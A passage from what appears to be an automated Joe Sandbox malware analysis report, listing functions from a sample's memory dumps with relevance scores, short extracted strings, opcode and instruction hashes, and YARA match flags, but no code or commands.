                  • Opcode Fuzzy Hash: 319527ce57500016c0ee3328aaaa88bd9801431d57f974024b34871fba5e5918
                  • Instruction Fuzzy Hash: 3A728B71A083409FD715CF28C890B9ABBE9BF88718F44891DF9898B392D775D944CF92
                  Function 0259B1B6 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %05+$1=#:
                  • API String ID: 0-340930863
                  • Opcode ID: fe561b566a0254f0f3e1918592c4782b20b9636603ac7caf6fd8c29b013eb652
                  • Instruction ID: 49b21221c47d2a811a9112d2238c4da1f07d10a8651db3074a7eea24ef8899cb
                  • Opcode Fuzzy Hash: fe561b566a0254f0f3e1918592c4782b20b9636603ac7caf6fd8c29b013eb652
                  • Instruction Fuzzy Hash: F5B128705047818BEB35CF29C880766BBF2BFA2318F188A5DD4EA4B796D774E405CB19
                  Function 025995E3 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SPVZ$oQ`_
                  • API String ID: 0-2981322771
                  • Opcode ID: 4b52938f53e7297574cdd2c9ee6528b30d20de90ebf0536577a753c10320dc22
                  • Instruction ID: 07578734931fdd329ddd06297be443886ff46bcf930f56467bca2473e7b67829
                  • Opcode Fuzzy Hash: 4b52938f53e7297574cdd2c9ee6528b30d20de90ebf0536577a753c10320dc22
                  • Instruction Fuzzy Hash: 10B18070104B818AD725CF35C0987A3FBE1BF56308F14495DD4EB4B693D7766109CB99
                  Function 02AD7A84 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: SPVZ$oQ`_
                  • API String ID: 0-2981322771
                  • Opcode ID: 458017d74f95f462c975ff674e148fb46220fc1382ba586220c54189ba5415a4
                  • Instruction ID: b9a6b7d8d2e88681513251bc1f6f4a3c1a696c09bfb80bda5e8d421f3c8c9295
                  • Opcode Fuzzy Hash: 458017d74f95f462c975ff674e148fb46220fc1382ba586220c54189ba5415a4
                  • Instruction Fuzzy Hash: 12B19170104B818ED725CF35C4987A3FBF1AF5A308F44495DD4EB4B292DB7A610ACB95
                  Function 0258180F Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: pedc$tu
                  • API String ID: 0-946130849
                  • Opcode ID: 98693272bac9066f199d1d12b2a472a2d3284801d56d8d482f3f04b49837c1e7
                  • Instruction ID: a215c17357ae29df80c5462fe091974bec50b6ff4d7e2732bf7d39ae80cae910
                  • Opcode Fuzzy Hash: 98693272bac9066f199d1d12b2a472a2d3284801d56d8d482f3f04b49837c1e7
                  • Instruction Fuzzy Hash: AEB153B00093C18BD371DF15C494B9BBBE2AFC2304F549A5DE4D82B255C771594ACBAA
                  Function 025995E6 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SPVZ$oQ`_
                  • API String ID: 0-2981322771
                  • Opcode ID: c261143e1bacaea1c3f039ce571803c230de69b3be5612af942a24d539b6c72e
                  • Instruction ID: 9541eedabfe47dbe4e7adab05bac6f6e77d5513f0dc450645a2a99713031d80d
                  • Opcode Fuzzy Hash: c261143e1bacaea1c3f039ce571803c230de69b3be5612af942a24d539b6c72e
                  • Instruction Fuzzy Hash: 40A17D70104B818AE725CF35C4A87E3BBE1BF56304F14495DD4EB8B293DB76A109CB99
                  Function 02AD7A87 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: SPVZ$oQ`_
                  • API String ID: 0-2981322771
                  • Opcode ID: ac71d6acbc9698f20fc626cfc9dccc3170c28fdd2bf419bd864f0f1d5854e51d
                  • Instruction ID: 0cc74e8c5740525734fbfb1daf75888777aa36b19cccb646adc8b12dfcf28cd9
                  • Opcode Fuzzy Hash: ac71d6acbc9698f20fc626cfc9dccc3170c28fdd2bf419bd864f0f1d5854e51d
                  • Instruction Fuzzy Hash: 98A17D70104B418AD325CF35C4947E3FBF1AF56308F44495DD4EB8B292DB7AA14ACB94
                  Function 0258CEBF Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 89$i3g
                  • API String ID: 0-683074060
                  • Opcode ID: 03269306725f5cdb1e1f3f87e500094822d9197471e1afe8bbd9f47c568336ad
                  • Instruction ID: a85f83c30cfd0ec44f7abebd8c6248ff21e96f4e8ae89731358c91ddb6aa4cd3
                  • Opcode Fuzzy Hash: 03269306725f5cdb1e1f3f87e500094822d9197471e1afe8bbd9f47c568336ad
                  • Instruction Fuzzy Hash: AF6152B01083419FD314EF29C48062ABBF1FF8A354F148A1DE5E89B390E378D945CB9A
                  Function 02ACB360 Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: 89$i3g
                  • API String ID: 0-683074060
                  • Opcode ID: e3ee39de245a384e4479bb16cf0a25192af0057384284eba4ce047c8a2c472de
                  • Instruction ID: c48faebfa14bc3dd933f0a35746bbef1090f926c9df59755beac092d699abb34
                  • Opcode Fuzzy Hash: e3ee39de245a384e4479bb16cf0a25192af0057384284eba4ce047c8a2c472de
                  • Instruction Fuzzy Hash: EE6140B05083419FD310DF19C58162BBBF5EF8A358F148A1CE4E89B3A0E779D945CB96
                  Function 0259902D Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SPVZ$oQ`_
                  • API String ID: 0-2981322771
                  • Opcode ID: 621f567526d05ad485d275641fa5306546c7bf58b56a77c3b657ef5c1063304f
                  • Instruction ID: 61a095d937fb3c6a56cb02e0ccd6a7a90fcf54e9076e5fef84ca23572579ef25
                  • Opcode Fuzzy Hash: 621f567526d05ad485d275641fa5306546c7bf58b56a77c3b657ef5c1063304f
                  • Instruction Fuzzy Hash: 2E5116B4500B458AD724DF34C498BA3BBE1BF55304F04496DD0FA8B252DB76A54ACF98
                  Function 02AD74CE Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: SPVZ$oQ`_
                  • API String ID: 0-2981322771
                  • Opcode ID: 9f1f5af06fef8847e58e02ceaad4082283200268032830ca44468a3f361b54c5
                  • Instruction ID: 716e77a7349772fd8971a53311fade6d9e6b1032eb47563a2b8c32ac5c5732ff
                  • Opcode Fuzzy Hash: 9f1f5af06fef8847e58e02ceaad4082283200268032830ca44468a3f361b54c5
                  • Instruction Fuzzy Hash: 2D511470540B418AD724DF34C498BE3BBE1BB59308F04495DD0EB8B292DB76A54ACF94
                  Function 025983EF Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "
                  • API String ID: 0-123907689
                  • Opcode ID: 4b3c65280416241559df480a7ae6a69ca179930c789bec3efee6e61d9a5da775
                  • Instruction ID: 0d7fbadd0d6fc7a24c95a547687818280ce90ebbb135fde11a3f598fe91b2e68
                  • Opcode Fuzzy Hash: 4b3c65280416241559df480a7ae6a69ca179930c789bec3efee6e61d9a5da775
                  • Instruction Fuzzy Hash: 0202B372A083019FCB14CF28C48866BBBE6BFC6314F18896DF49997381D735D905CB9A
                  Function 02AD6890 Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: "
                  • API String ID: 0-123907689
                  • Opcode ID: 19298e3613673ad565e03fa639eed70dd4be0c99a08a0835dd34674178309775
                  • Instruction ID: d510cd820d9417467e9e40bf82405a5d3468deda89e26899976aa4b33925399c
                  • Opcode Fuzzy Hash: 19298e3613673ad565e03fa639eed70dd4be0c99a08a0835dd34674178309775
                  • Instruction Fuzzy Hash: 2802C671A083019FC714CF29D49066BB7EAAFC8B14F19892DE89A87391DF35D944CB82
                  Function 0258AD1F Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 21
                  • API String ID: 0-4252452532
                  • Opcode ID: 4064fee5ccf8e9f7ea47b880797424d5e22b8931e37390ac6f0c48e2f7e81f68
                  • Instruction ID: 1c53551d1f4e1571cca51c4967f66de03c48f1678ede22e00e90efb6af2bef58
                  • Opcode Fuzzy Hash: 4064fee5ccf8e9f7ea47b880797424d5e22b8931e37390ac6f0c48e2f7e81f68
                  • Instruction Fuzzy Hash: C0C188B25083118BC718EF14C89176BBBF1FF85358F048A1DE8D6AB391E7B49905CB96
                  Function 02593DEF Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: 48c197f25437caa990e3eb44bc63b80a6322121267b80a9ba78fcb593ed34c2e
                  • Instruction ID: 3706588099eb889d7e322fcd9e71c32d7336bb8104b1b304e62633a757c8fca9
                  • Opcode Fuzzy Hash: 48c197f25437caa990e3eb44bc63b80a6322121267b80a9ba78fcb593ed34c2e
                  • Instruction Fuzzy Hash: A2C1EFB2A083119BDB14DF28C89172BBBE2FB94314F14496DE4C58B391E774DC41CB9A
                  Function 0258A73F Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: pq
                  • API String ID: 0-1239689891
                  • Opcode ID: b52d2b3e1abe94023928692ed8eca17259254ab6da43d6fc1e5404b8dc5fc276
                  • Instruction ID: 505a7525d6893add1280c64caf54e95c0f34cf2c0014288bf1ead93e2921b59d
                  • Opcode Fuzzy Hash: b52d2b3e1abe94023928692ed8eca17259254ab6da43d6fc1e5404b8dc5fc276
                  • Instruction Fuzzy Hash: 02A1A9B05083118BC324DF14C4A176BBBF2FFC5364F049A1DE8C96B6A1E7B49945CB9A
                  Function 02AC8BE0 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: pq
                  • API String ID: 0-1239689891
                  • Opcode ID: 742c21bc8d0ca29627062b564025fae1388f40622ff7fa4133b43a84c1355375
                  • Instruction ID: 016b88de925a6045fd3f0debfcc6c0c22617f8069a225b7bc42a14a289b48ae5
                  • Opcode Fuzzy Hash: 742c21bc8d0ca29627062b564025fae1388f40622ff7fa4133b43a84c1355375
                  • Instruction Fuzzy Hash: 1FA177B05083118BC325CF14C49176BBBF1FF85368F149A1DE8C95B3A1EB389945CB96
                  Function 025AEB6F Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: onih
                  • API String ID: 0-4145997799
                  • Opcode ID: 5100a89aef9393edb5e690662e534ded6ba2aa6c42b51b3c77238ad3bb21cd85
                  • Instruction ID: a09af81523b8809d9f293ae959d345422fdb181a2eb7b62eb78c221c8de4c0f2
                  • Opcode Fuzzy Hash: 5100a89aef9393edb5e690662e534ded6ba2aa6c42b51b3c77238ad3bb21cd85
                  • Instruction Fuzzy Hash: D791B4756043029BDB28CF29C8A2A6FBBE2FF85714F14892CE8858B351E734DC41CB95
                  Function 02AED010 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: onih
                  • API String ID: 0-4145997799
                  • Opcode ID: 705434e9dad209dfe50009b3e328957ea1b7f9b229997c19d61935f705eb0b34
                  • Instruction ID: f7b9775b32cef472343fa14620ccf2f32498c903cb640f21fa4de96a61c5c4d3
                  • Opcode Fuzzy Hash: 705434e9dad209dfe50009b3e328957ea1b7f9b229997c19d61935f705eb0b34
                  • Instruction Fuzzy Hash: 5491A3716047028BDB28CF29C8D0A6BB7F6FF88714F15895CE8868B351DB34D816CB91
                  Function 025AEE9F Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: onih
                  • API String ID: 0-4145997799
                  • Opcode ID: d0fea167b5a10c3a4e5d3676a8666f7be2fdb452339ade0909839c9d70c3e0b3
                  • Instruction ID: 1fda44898ace21d4538a45bb203dcd09c53d0dfec7d24b3c659f0c78f534e18a
                  • Opcode Fuzzy Hash: d0fea167b5a10c3a4e5d3676a8666f7be2fdb452339ade0909839c9d70c3e0b3
                  • Instruction Fuzzy Hash: 93A1F2726043128BC714CF18C8A266FB7E2FF98714F19892CE9869B391D735EC51CB99
                  Function 02AED340 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: onih
                  • API String ID: 0-4145997799
                  • Opcode ID: 56db6769629c6799c3e7e9b7fdf1c977e37c2c40f3921ec47a1326f56fc04646
                  • Instruction ID: 9dffeb82ea88bc697ca3ab5b3ea057b13686ced8f63e81eac9f7f00050a15d02
                  • Opcode Fuzzy Hash: 56db6769629c6799c3e7e9b7fdf1c977e37c2c40f3921ec47a1326f56fc04646
                  • Instruction Fuzzy Hash: 20A111726047128FCB14DF18C890A6BB7E6FF94714F19892CE9869B391DB34EC12CB91
                  Function 02578DCF Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,
                  • API String ID: 0-3772416878
                  • Opcode ID: 86f62b5604842ce1f7ca52302b7e5df8f04c9ff236e8dd1df0e87c56affa13dc
                  • Instruction ID: dacd4b46e0f664d36a27764779115dd876613f59ab129f39edf17cea0a013d26
                  • Opcode Fuzzy Hash: 86f62b5604842ce1f7ca52302b7e5df8f04c9ff236e8dd1df0e87c56affa13dc
                  • Instruction Fuzzy Hash: 68B118711493819FD315CF68D88465ABFE0BFA9304F444A2DF59897382C371DA58CBA6
                  Function 02AB7270 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: ,
                  • API String ID: 0-3772416878
                  • Opcode ID: 86f62b5604842ce1f7ca52302b7e5df8f04c9ff236e8dd1df0e87c56affa13dc
                  • Instruction ID: 3b49c2f5c23f55b27c443a90ac648440bc8e0834dbca9a0535c6ba7df2884ee2
                  • Opcode Fuzzy Hash: 86f62b5604842ce1f7ca52302b7e5df8f04c9ff236e8dd1df0e87c56affa13dc
                  • Instruction Fuzzy Hash: 12B12771109381AFD315CF68C88475EFBE5AF99308F444A5DF59897382C771EA18CBA2
                  Function 025AE89F Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: onih
                  • API String ID: 0-4145997799
                  • Opcode ID: e41d521abc39db14932371a842c1d9dbbd82e3b381bcda21e8c537e9fa56ddb4
                  • Instruction ID: 0a3f0c54d1638257afd70d447a6616a808eb9e28814ba6ba2f81ecaae3c1759b
                  • Opcode Fuzzy Hash: e41d521abc39db14932371a842c1d9dbbd82e3b381bcda21e8c537e9fa56ddb4
                  • Instruction Fuzzy Hash: FE81C576A043128BD714DF18C8A2B6FB7E2FF85714F15892CE58697260D730ED11CB9A
                  Function 025873D0 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :Y>_
                  • API String ID: 0-1739490814
                  • Opcode ID: 7ddf8862621f23c966b43855df4ec744175da09b599863facba1ef610f301382
                  • Instruction ID: 5aeb64cd5c92e6190941a589f1e5da5d1214337dc49325dc643f0b619bb4e76e
                  • Opcode Fuzzy Hash: 7ddf8862621f23c966b43855df4ec744175da09b599863facba1ef610f301382
                  • Instruction Fuzzy Hash: D96105B4001B029FD324CF25C564722BBF2FF49718F24864CC49A5BBA5D7B9E855CB88
                  Function 02AC5871 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: :Y>_
                  • API String ID: 0-1739490814
                  • Opcode ID: 5cb91ee55d96497a9ef350b9d4dc9434e92fae6a778193ca97a2285b811521c4
                  • Instruction ID: 6aee112d47f189cb54414a2c5da9b2a1b6efd0951e6f550dbd77f0e8948517e9
                  • Opcode Fuzzy Hash: 5cb91ee55d96497a9ef350b9d4dc9434e92fae6a778193ca97a2285b811521c4
                  • Instruction Fuzzy Hash: F06135B0401B029FD3248F25C5A4B22BBF1FF45318F64868CD4AA5BB95D779F855CB84
                  Function 025AC16E Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: 34064f6043440a6587e234ef6f5b1ee4fb06dbcb3ee02ce2a1b0029468fb30db
                  • Instruction ID: f54b25f668646fd91c8207b892321725e79ab3e5426858d2bc49ef3a1250bc1a
                  • Opcode Fuzzy Hash: 34064f6043440a6587e234ef6f5b1ee4fb06dbcb3ee02ce2a1b0029468fb30db
                  • Instruction Fuzzy Hash: 8541B174605B41CFD316CF19C5A1726BBF2FF56308B18895EC0DA87B52C774A845CB88
                  Function 02AEA60F Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: ea022cb7b9f807ffecb045105c057a49f3202dda3799f0144d9376c2b4e755a0
                  • Instruction ID: 18b9f898b0527ff42f429ccf88daa8ace51ad61fb6a26d478857f4a618e002bd
                  • Opcode Fuzzy Hash: ea022cb7b9f807ffecb045105c057a49f3202dda3799f0144d9376c2b4e755a0
                  • Instruction Fuzzy Hash: E7416CB1605B418FD726CF29C5A0722BBF2EF56704B19895DC0DB8BB57CB38A846CB40
                  Function 02596CB1 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: 1cace36b5801956e51ce687a718df6113e0101155aaa87aad827b563fc102183
                  • Instruction ID: fbf65a9bbead1fd3dfce746588883258607fd9a2587c2bc0adf00de96d6bb4c5
                  • Opcode Fuzzy Hash: 1cace36b5801956e51ce687a718df6113e0101155aaa87aad827b563fc102183
                  • Instruction Fuzzy Hash: 7B214D75600B408FD725CF1AC8A0B27B7F6FB4A318F18582DD49AD7A61C7B0E844CB08
                  Function 02AD5152 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: 04e65069a58beb9ad9beb5dbe0cac3dbca1f1443cb3bc833e46f1b7f3c92e66f
                  • Instruction ID: 27c936cd03f5acc9496488a07a1c20682faf235106a6d94a6ef0148973755268
                  • Opcode Fuzzy Hash: 04e65069a58beb9ad9beb5dbe0cac3dbca1f1443cb3bc833e46f1b7f3c92e66f
                  • Instruction Fuzzy Hash: 76215676A00B408FD765DF1AC490B23B7E2FB4A319F94681DD08BC7A60CB74F8858B04
                  Function 02594D7C Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: 7879a16e20f9f2223490825ddf5ab8dcfe0a5ad2887b7f6a1b08cbb7d9d1f5f5
                  • Instruction ID: f5c4a180a852836de3dd2885c92fbba07d55b02ef7db94153473d95d602bc98c
                  • Opcode Fuzzy Hash: 7879a16e20f9f2223490825ddf5ab8dcfe0a5ad2887b7f6a1b08cbb7d9d1f5f5
                  • Instruction Fuzzy Hash: D62168766083818BDB389B14C4A4B7FBBA7FBC6304F18492DC48657280DB759802CB8B
                  Function 02AD321E Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: 66bee7b7600ebe6e750c9c9783407b8f413a666e3eb677ad21c9503ef89078c7
                  • Instruction ID: bafb5fca1167c6115fbcde294d8769799ff83d1484914d88d53972a46081fec1
                  • Opcode Fuzzy Hash: 66bee7b7600ebe6e750c9c9783407b8f413a666e3eb677ad21c9503ef89078c7
                  • Instruction Fuzzy Hash: 59216872A083C18FDB289B14C4A4B6FB7A2FBC5304F19989DC58747684DB759812CB86
                  Function 02595314 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /.)(
                  • API String ID: 0-2587180175
                  • Opcode ID: f21066aa4936aa9c5cb7f74743d188a96ad691ceccfef809ee53785bdda3cb95
